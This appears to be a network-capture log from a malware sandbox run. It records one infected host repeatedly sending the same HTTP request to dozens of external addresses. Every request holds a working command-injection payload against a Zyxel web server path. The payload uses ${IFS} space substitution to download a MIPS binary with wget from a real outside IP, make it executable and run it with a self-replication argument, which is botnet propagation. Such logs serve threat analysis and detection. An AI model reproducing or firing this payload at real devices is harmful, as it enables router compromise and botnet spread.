                                                  Jan 19, 2024 18:23:46.865221024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2158192.168.2.1353648115.56.208.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865259886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2159192.168.2.134237835.180.187.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865302086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2160192.168.2.1352648102.57.193.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865351915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2161192.168.2.133732082.208.4.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865398884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2162192.168.2.1357312173.242.117.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865448952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2163192.168.2.1348578124.119.206.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865483999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2164192.168.2.1341634151.40.37.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865499020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2165192.168.2.135822612.101.195.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865534067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2166192.168.2.13407468.166.234.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865571976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2167192.168.2.1353684190.15.34.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865618944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2168192.168.2.135640224.139.163.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865679026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2169192.168.2.134473691.47.230.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865701914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2170192.168.2.1355130177.190.171.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865784883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2171192.168.2.134235490.160.146.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865808964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2172192.168.2.1340408106.101.149.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865839958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2173192.168.2.1335518157.84.110.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865879059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2174192.168.2.1357848180.32.155.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865920067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2175192.168.2.1360576125.55.67.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865966082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2176192.168.2.1332974101.239.31.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865995884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2177192.168.2.1343002113.199.11.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866014004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2178192.168.2.1356398222.249.41.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866050959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2179192.168.2.133935663.30.174.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866096973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2180192.168.2.135216253.44.239.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866147995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2181192.168.2.1341694165.49.175.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866164923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2182192.168.2.1342840134.73.75.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866225958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2183192.168.2.1359588201.116.203.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866270065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2184192.168.2.1354508150.189.207.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866312027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2185192.168.2.1343282166.52.132.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866360903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2186192.168.2.134833099.113.125.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866389036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2187192.168.2.1346326206.1.67.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866426945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2188192.168.2.135679420.78.246.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866486073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2189192.168.2.135550625.168.146.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866544008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2190192.168.2.1348568186.91.200.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866600990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2191192.168.2.134566819.227.177.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866628885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192192.168.2.1350270221.234.188.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866688013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2193192.168.2.1343774204.222.146.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866714001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2194192.168.2.133749212.179.88.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866756916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2195192.168.2.134398872.221.137.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866833925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2196192.168.2.1354438113.76.81.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866961002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2197192.168.2.13459228.45.244.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.866987944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2198192.168.2.135001225.186.47.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867038965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2199192.168.2.135668036.76.99.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867084026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2200192.168.2.1333770186.37.191.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867111921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2201192.168.2.135734298.207.52.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867170095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2202192.168.2.1332878154.108.22.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867208004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2203192.168.2.1339720202.119.147.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867305040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2204192.168.2.1348864170.243.154.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867331028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2205192.168.2.1333846135.17.137.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867350101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2206192.168.2.1342992195.91.101.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867357016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2207192.168.2.1359054118.17.99.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867396116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2208192.168.2.1350644218.230.245.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867435932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2209192.168.2.134658070.138.220.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867465973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2210192.168.2.133658835.22.136.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867489100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2211192.168.2.134887072.153.88.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867542982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2212192.168.2.1348470113.185.112.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867566109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2213192.168.2.1355346190.220.238.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867619038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2214192.168.2.1352114122.20.186.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867645979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2215192.168.2.134694065.35.139.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867687941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2216192.168.2.1334970210.145.205.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867708921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2217192.168.2.1357932205.7.185.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867739916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2218192.168.2.1334020193.5.183.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867777109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2219192.168.2.135887641.94.224.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.867816925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2220192.168.2.1336328143.18.157.38443
                                                  TimestampBytes transferredDirectionData
